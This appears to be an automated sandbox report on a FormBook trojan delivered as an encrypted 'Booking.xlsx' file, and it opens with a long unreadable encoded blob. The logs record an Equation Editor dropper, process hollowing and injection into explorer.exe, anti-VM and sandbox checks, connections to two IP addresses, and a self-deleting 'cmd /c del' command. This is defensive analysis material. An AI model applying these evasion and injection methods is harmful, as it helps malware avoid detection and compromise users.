vbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/8@6/4
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Booking.xlsxJump to behavior
              Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\vkakGWsQh
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA2D.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
              Source: Booking.xlsxReversingLabs: Detection: 23%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: Booking.xlsxStatic file information: File size 2512384 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.2218174024.0000000000859000.00000004.00000020.sdmp
              Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
              Source: Booking.xlsxInitial sample: OLE indicators vbamacros = False
              Source: Booking.xlsxInitial sample: OLE indicators encrypted = True

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: svchost[1].2.dr, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.vbc.exe.cf0000.2.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.vbc.exe.cf0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 6.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 6.2.vbc.exe.cf0000.4.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\Public\vbc.exeCode function: 4_2_003BA0DC push edi; iretd 4_2_003BA0DF
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00417867 push edx; retf 6_2_00417869
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B124 push 423E369Ah; iretd 6_2_0041B12B
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00416625 push ds; retf 6_2_00416626
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041DF6E push ds; ret 6_2_0041DF77
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00410FA6 push ebx; ret 6_2_00410FA7
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0095DFA1 push ecx; ret 6_2_0095DFB4
              Source: C:\Users\Public\vbc.exeCode function: 6_2_003DE3E6 pushad ; ret 6_2_003DE3E7
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021DDFA1 push ecx; ret 8_2_021DDFB4
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DB124 push 423E369Ah; iretd 8_2_000DB12B
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D6625 push ds; retf 8_2_000D6626
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D7867 push edx; retf 8_2_000D7869
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DCEB5 push eax; ret 8_2_000DCF08
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DCF0B push eax; ret 8_2_000DCF72
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DCF02 push eax; ret 8_2_000DCF08
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DCF6C push eax; ret 8_2_000DCF72
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000DDF6E push ds; ret 8_2_000DDF77
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_000D0FA6 push ebx; ret 8_2_000D0FA7
              Source: initial sampleStatic PE information: section name: .text entropy: 7.61467077394
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]Jump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1]Jump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Modifies the prolog of user mode functions (user mode inline hooks)Show sources
              Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE8
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: Booking.xlsxStream path 'EncryptedPackage' entropy: 7.9999180457 (max. 8.0)

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2900, type: MEMORY
              Source: Yara matchFile source: 4.2.vbc.exe.2342320.3.raw.unpack, type: UNPACKEDPE
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000000C9B5E second address: 00000000000C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0Jump to behavior
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\Public\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00409A90 rdtsc 6_2_00409A90
              Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2924Thread sleep time: -360000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2920Thread sleep time: -104858s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2448Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2448Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\Public\vbc.exe TID: 2484Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 552Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 2264Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: explorer.exe, 00000007.00000002.2380038616.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: )m"SOFTWARE\VMware, Inc.\VMware Tools48*m\
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: explorer.exe, 00000007.00000000.2192413484.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: )m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: *m"SOFTWARE\VMware, Inc.\VMware Tools
              Source: vbc.exe, 00000004.00000002.2181863454.00000000024C6000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: )m"SOFTWARE\VMware, Inc.\VMware Tools
              Source: vbc.exe, 00000004.00000002.2181863454.00000000024C6000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: explorer.exe, 00000007.00000000.2185690395.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
              Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 6_2_00409A90 rdtsc 6_2_00409A90
              Source: C:\Users\Public\vbc.exeCode function: 6_2_0040ACD0 LdrLoadDll,6_2_0040ACD0
              Source: C:\Users\Public\vbc.exeCode function: 6_2_009626F8 mov eax, dword ptr fs:[00000030h]6_2_009626F8
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_021E26F8 mov eax, dword ptr fs:[00000030h]8_2_021E26F8
              Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.165 80Jump to behavior
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
              Maps a DLL or memory area into another processShow sources
              Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)Show sources
              Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 1388Jump to behavior
              Queues an APC in another process (thread injection)Show sources
              Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: DA0000Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
              Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000007.00000002.2380038616.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000007.00000000.2185884184.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE
